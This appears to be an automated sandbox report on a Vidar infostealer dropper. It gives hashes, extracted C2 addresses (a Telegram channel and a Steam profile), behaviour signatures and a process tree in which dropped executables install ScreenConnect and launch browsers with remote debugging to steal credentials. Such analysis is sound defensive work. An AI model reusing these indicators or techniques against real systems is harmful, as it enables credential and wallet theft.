Resubmissions

  • 14-02-2025 01:10: 250214-bjsnnayne1 (score 10)
  • 14-02-2025 01:00: 250214-bc5pmsymhw (score 10)
  • 13-02-2025 05:01: 250213-fnkwtstpgw (score 10)
  • 13-02-2025 04:24: 250213-e1kk6atmaz (score 10)
  • 13-02-2025 04:08: 250213-eqe8patkgx (score 8)
  • 12-02-2025 23:56: 250212-3yzt3azrdx (score 10)
  • 12-02-2025 23:44: 250212-3rgd5szmbm (score 10)
  • 12-02-2025 23:19: 250212-3a9dlazkep (score 10)
  • 12-02-2025 13:32: 250212-qs211ssrfr (score 10)

Analysis

  • max time kernel
    1800s
  • max time network
    1801s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250210-en
  • resource tags

    arch:x64, arch:x86, image:win11-20250210-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    14-02-2025 01:10

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

vidar

C2

https://t.me/b4cha00

https://steamcommunity.com/profiles/76561199825403037

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0

Signatures

  • Detect Vidar Stealer 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Downloads MZ/PE file 11 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 4 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 24 IoCs
  • Modifies data under HKEY_USERS 62 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Downloads MZ/PE file
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4900
    • C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
      "C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1144
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
        3⤵
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        PID:952
    • C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe
      "C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3136
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
        3⤵
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        PID:2276
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping …-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4Mzk2NiIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjQwMTY2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUwNDc2OTcwNjEiLz48L2FwcD48L3JlcXVlc3Q-
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    PID:3740
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /0
    1⤵
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4788
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:3580
  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Downloads MZ/PE file
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:720
    • C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
      "C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1208
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
        3⤵
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:652
    • C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
      "C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
        3⤵
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        PID:872
    • C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe
      "C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      PID:2356
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Drops file in Windows directory
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        PID:2160
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe81f8cc40,0x7ffe81f8cc4c,0x7ffe81f8cc58
          4⤵
          PID:1596
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=1732 /prefetch:2
          4⤵
          PID:4852
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2148 /prefetch:3
          4⤵
          PID:4632
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2404 /prefetch:8
          4⤵
          PID:2096
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3184 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:1964
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3332,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3316 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:3632
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4524 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:2884
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3604 /prefetch:8
          4⤵
          PID:836
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4780 /prefetch:8
          4⤵
          PID:1780
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4932 /prefetch:8
          4⤵
          PID:4592
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4768 /prefetch:8
          4⤵
          PID:2528
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4896 /prefetch:8
          4⤵
          PID:252
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4884 /prefetch:8
          4⤵
          PID:2080
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        PID:4676
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe81f93cb8,0x7ffe81f93cc8,0x7ffe81f93cd8
          4⤵
          PID:736
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
          4⤵
          PID:3284
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
          4⤵
          PID:3704
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8
          4⤵
          PID:2996
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:1592
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:2744
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1972 /prefetch:2
          4⤵
          PID:1488
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2116 /prefetch:2
          4⤵
          PID:2828
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2032 /prefetch:2
          4⤵
          PID:1932
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4040 /prefetch:2
          4⤵
          PID:1536
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4024 /prefetch:2
          4⤵
          PID:2696
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:3388
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:3632
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 /prefetch:8
          4⤵
          PID:2988
    • C:\Users\Admin\AppData\Local\Temp\a\main.exe
      "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3268
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Boot or Logon Autostart Execution: Authentication Package
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 744EA09B7BA7B5D76F054C87DCC8941F C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241272359 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:252
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      PID:5116
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding DA876DEF3671D31DDC65F679980BD4AA
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2352
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 3B1B9C597AEA9010FCAF39907D2E9063 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4824
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 89B8F36B5097067F3BBED7A68D7C8476 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3632
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIE713.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241297203 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:996
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 5D41985BF1B96B1414A5AB28F558D6FC
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4128
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 00E078E3CA27A03288DE8EC44A19694A E Global\MSI0000
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3064
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 58C4699C69D4AA893D4A4F40DCBA4615 C
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4376
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI21CB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241312296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3820
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 3C6B355A5EF4EFC2CF598C26657793FE
                                                  2⤵
                                                  • Loads dropped DLL
